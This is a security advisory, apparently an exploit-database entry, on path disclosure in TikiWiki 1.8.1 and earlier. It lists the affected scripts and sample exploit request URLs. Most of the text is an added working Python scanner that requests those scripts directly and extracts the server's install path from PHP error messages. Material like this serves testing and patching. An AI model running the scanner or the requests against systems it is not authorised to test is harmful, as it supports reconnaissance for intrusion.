[Original text] Tiki CMS/Groupware (TikiWiki) 1.8.1 and earlier allows remote attackers to gain sensitive information via a direct request to (1) banner_click.php, (2) categorize.php, (3) tiki-admin_include_directory.php, or (4) tiki-directory_search.php, each of which reveals the web server path in an error message.
source: http://www.securityfocus.com/bid/10100/info
Multiple vulnerabilities have been identified in various modules of TikiWiki. They may allow a remote attacker to carry out attacks such as path disclosure, cross-site scripting, HTML injection, SQL injection, directory traversal, and arbitrary file upload.
tiki-browse_categories.php?find=&deep=off&parentId=[VID]&offset=[INT]&sort_mode=
tiki-browse_categories.php?find=&deep=off&parentId=[VID]&offset=
TikiWiki banner_click.php Direct Request Path Disclosure
Remote / Network Access
Information Disclosure, Input Manipulation
Loss of Confidentiality, Loss of Integrity
Exploit Public
Vendor Verified
-
Vulnerability Description
TikiWiki contains a flaw that may lead to unauthorized information disclosure. The issue is triggered when a remote attacker calls the "banner_click.php" script directly, with abnormal or missing parameters; the resulting PHP error message discloses the physical path of the script on the web server, resulting in a loss of confidentiality.
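The check a tester would run for this class of flaw, as an added example that is not part of the original advisory or of TikiWiki itself: request each script the advisory names directly, then look for the PHP display_errors signature ("<level>: <message> in <absolute path>.php on line <n>", with or without the <b> tags that html_errors adds) and strip the script name off the disclosed path to recover the install directory. The response bodies used here are constructed to illustrate the pattern; the host, the User-Agent string and the fetch helper are assumptions, not anything the advisory specifies.

```python
import re
import urllib.error
import urllib.request
from urllib.parse import urljoin

# The four scripts the advisory names as revealing the web server path on a direct request.
DIRECT_REQUEST_SCRIPTS = (
    "banner_click.php",
    "categorize.php",
    "tiki-admin_include_directory.php",
    "tiki-directory_search.php",
)

TAG_RE = re.compile(r"<[^>]+>")
# PHP display_errors format: "<level>: <message> in <absolute path>.php on line <n>".
# The path alternation accepts Unix (/var/www/...) and Windows (C:\inetpub\...) roots.
PHP_ERROR_RE = re.compile(
    r"(?P<level>Warning|Notice|Fatal error|Parse error):\s*(?P<msg>.*?)\s+in\s+"
    r"(?P<path>(?:/|[A-Za-z]:[\\/])[^\s<]*?\.php)\s+on line\s+(?P<line>\d+)",
    re.S,
)

# Constructed sample bodies (assumed, not captured from a real host): one html_errors=On
# warning of the kind a direct request to banner_click.php produces, and one clean page.
SAMPLE_VULNERABLE_BODY = (
    "<br />\n<b>Warning</b>:  include(tiki-setup.php) "
    "[<a href='function.include'>function.include</a>]: failed to open stream: "
    "No such file or directory in <b>/var/www/html/tiki/banner_click.php</b> "
    "on line <b>5</b><br />\n"
)
SAMPLE_CLEAN_BODY = "<html><body>Redirecting...</body></html>"


def extract_disclosed_paths(body):
    """Return [(level, absolute_path, line)] for every PHP error in body, [] if none."""
    text = TAG_RE.sub("", body)  # html_errors wraps fields in <b>...</b>; drop the tags first
    return [
        (m.group("level"), m.group("path"), int(m.group("line")))
        for m in PHP_ERROR_RE.finditer(text)
    ]


def web_root(path):
    """Strip the script filename: the attacker learns the installation directory."""
    sep = "\\" if re.match(r"[A-Za-z]:\\", path) else "/"
    return path.rsplit(sep, 1)[0]


def check_target(base_url, fetch=None):
    """Request each script directly (no parameters) and map script -> disclosed paths.

    fetch(url) -> body is injectable so the logic runs offline against constructed bodies.
    """
    if fetch is None:
        def fetch(url):
            req = urllib.request.Request(
                url, headers={"User-Agent": "tiki-path-disclosure-check"}  # assumed UA
            )
            try:
                with urllib.request.urlopen(req, timeout=10) as resp:
                    return resp.read().decode("utf-8", "replace")
            except urllib.error.HTTPError as err:
                # A 500 page still carries the PHP message; keep its body.
                return err.read().decode("utf-8", "replace")

    findings = {}
    for script in DIRECT_REQUEST_SCRIPTS:
        hits = extract_disclosed_paths(fetch(urljoin(base_url, script)))
        if hits:
            findings[script] = [(web_root(p), p, line) for _, p, line in hits]
    return findings


if __name__ == "__main__":
    # Offline demonstration: only banner_click.php "returns" the constructed warning.
    fake = lambda u: SAMPLE_VULNERABLE_BODY if u.endswith("banner_click.php") else SAMPLE_CLEAN_BODY
    for script, hits in check_target("http://example.invalid/tiki/", fetch=fake).items():
        for root, path, line in hits:
            print(f"{script}: install root {root} disclosed by {path} line {line}")
```

Run against a live host by calling check_target("http://host/tiki/") without the fetch argument; an empty dict means none of the four scripts leaked a path. Because the match is on PHP's error format rather than on a fixed string, the same check also catches the other path-disclosure variants of this advisory, and it still fires when the server answers with a 500 rather than a 200.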
-
Timeline
2004-04-11
Unknown
2004-04-11
Unknown
-
Solution
Upgrade to version 1.8.2 or higher, which is reported to fix this vulnerability. An upgrade is required, as there are no known workarounds.